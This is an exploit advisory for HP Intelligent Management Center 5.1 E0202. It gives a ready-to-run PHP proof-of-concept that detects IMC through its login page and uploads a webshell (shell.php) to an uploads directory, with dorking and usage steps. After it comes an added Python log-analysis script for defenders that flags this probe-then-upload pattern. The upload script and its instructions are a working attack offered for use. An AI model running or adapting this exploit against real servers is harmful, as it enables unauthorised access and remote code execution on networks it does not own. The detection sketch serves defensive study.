=============================================================================================================================================
| # Title : HP Intelligent Management Center 5.1 E0202 Shell Upload Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 135.0.1 (64 bits) |
| # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c03177356 |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: Upload a malicious PHP file (such as a Webshell) to the server.

[+] Save code as poc.php.

[+] Set Target : line 54

[+] Usage : php poc.php

[+] PayLoad :

<?php

function is_imc($target) {
    $url = "$target/login.jsf";
    $response = @file_get_contents($url);

    if ($response !== false && strpos($response, "HP Intelligent Management Center") !== false) {
        return true;
    }
    return false;
}

function upload_file($ip, $port, $target_uri, $upload_path, $local_file) {
    if (!is_imc("http://$ip:$port$target_uri")) {
        echo "$ip:$port - This isn't an HP Intelligent Management Center\n";
        return;
    }

    $file_content = file_get_contents($local_file);
    if ($file_content === false) {
        echo "Failed to read local file: $local_file\n";
        return;
    }

    $boundary = "----WebKitFormBoundary" . md5(time());
    $eol = "\r\n";

    $data = "--$boundary$eol";
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($local_file) . "\"$eol";
    $data .= "Content-Type: application/octet-stream$eol$eol";
    $data .= $file_content . "$eol";
    $data .= "--$boundary--$eol";

    $opts = [
        "http" => [
            "method" => "POST",
            "header" => "Content-Type: multipart/form-data; boundary=$boundary\r\n",
            "content" => $data
        ]
    ];

    $url = "http://$ip:$port$target_uri/$upload_path";
    echo "$ip:$port - Uploading file...\n";
    $response = @file_get_contents($url, false, stream_context_create($opts));

    if ($response !== false) {
        echo "$ip:$port - File uploaded successfully to $url\n";
    } else {
        echo "$ip:$port - File upload failed\n";
    }
}

// Example usage
$ip = "192.168.1.1";
$port = 8080;
$target_uri = "/imc";
$upload_path = "uploads/shell.php"; // Adjust this path as needed
$local_file = "shell.php"; // Your payload file

upload_file($ip, $port, $target_uri, $upload_path, $local_file);

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
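
Detection sketch for defenders, added here and not part of the original advisory: the PoC above fetches login.jsf and then POSTs a multipart body to a script-named path, which leaves a recognisable pair of entries in a web access log. The log lines, the extension list and the 60-second window are constructed assumptions; adjust them to the server in front of IMC.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /imc/login.jsf HTTP/1.1" 200 5120 "-" "-"
203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "POST /imc/uploads/shell.php HTTP/1.1" 200 12 "-" "-"
198.51.100.4 - - [10/Mar/2025:10:05:00 +0000] "GET /imc/login.jsf;jsessionid=AB12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2025:10:05:09 +0000] "POST /imc/login.jsf HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2025:11:00:00 +0000] "POST /imc/uploads/report.JSP HTTP/1.1" 404 0 "-" "-"
"""

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".php", ".jsp", ".jspx")  # assumption: extensions the server might execute
PROBE_SUFFIX = "/login.jsf"             # page the PoC requests before uploading
WINDOW = timedelta(seconds=60)          # assumption: probe-to-upload correlation window


def detect(log_text):
    """Return (client, request target, status, severity) for suspicious POSTs."""
    last_probe = {}  # client IP -> time of its most recent GET of login.jsf
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, ts, method, target, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        # Drop query string and ;jsessionid path parameters before matching.
        path = re.split(r"[?;]", target, maxsplit=1)[0].lower()
        if method == "GET" and path.endswith(PROBE_SUFFIX):
            last_probe[ip] = when
        elif method == "POST" and path.endswith(SCRIPT_EXT):
            probed = ip in last_probe and when - last_probe[ip] <= WINDOW
            accepted = status.startswith("2")
            # A probe followed by an accepted script-named POST matches the PoC flow.
            severity = "high" if probed and accepted else "review"
            findings.append((ip, target, int(status), severity))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

A "high" finding warrants checking the target directory for files created at the logged time; "review" entries are script-named POSTs that were rejected or had no preceding probe.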